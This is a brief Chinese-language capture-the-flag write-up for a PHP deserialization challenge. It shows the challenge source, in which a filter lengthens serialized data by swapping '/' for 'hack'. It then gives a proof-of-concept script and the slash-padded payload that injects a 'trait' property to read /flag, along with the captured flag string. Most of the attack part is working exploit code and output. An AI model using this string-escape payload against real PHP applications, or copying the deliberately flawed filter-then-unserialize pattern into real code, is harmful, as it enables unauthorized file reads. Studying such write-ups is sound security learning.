源码
<?php
function filter($params)
{
$safe = array("flag", "/");
return str_replace($safe, "hack", $params);
}
class Scorpio
{
var $hobby;
var $trait = 'Mystery';
function __construct($hobby)
{
$this->hobby = $hobby;
}
}
if (isset($_REQUEST['Scorpio'])) {
$data = new Scorpio($_REQUEST['Scorpio']);
var_dump($data);
$serData = serialize($data);
$profile = unserialize(filter($serData));
if ($profile->trait === 'escaping') {
echo file_get_contents("/flag");
}
} else echo "系统检测发现该处漏洞,进行攻击测试\n";
?>
|
POC
<?php
function filter($params)
{
$safe = array("flag", "/");
return str_replace($safe, "hack", $params);
}
class Scorpio
{
var $hobby;
var $trait = 'Mystery';
function __construct($hobby)
{
$this->hobby = $hobby;
}
}
$repeat = str_repeat("/", 10);
$hobby = $repeat . '";s:5:"trait";s:8:"escaping";}';
echo $hobby;
$param = serialize(new Scorpio($hobby));
|
//////////";s:5:"trait";s:8:"escaping";}
|
传入paylaod ,得到
object(Scorpio)#1 (2) {
["hobby"]=>
string(40) "//////////";s:5:"trait";s:8:"escaping";}"
["trait"]=>
string(7) "Mystery"
}
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
|
利用filter()函数增多字符串,使得";s:5:"trait";s:8:"escaping";}被多出来的30个字符挤到第2参数的位置,而原本的第2参数将会由于}的提前闭合而无效化
参考:https://www.yuque.com/shiyizhesonder/sonder39/xps4p25lgkgwi2a8
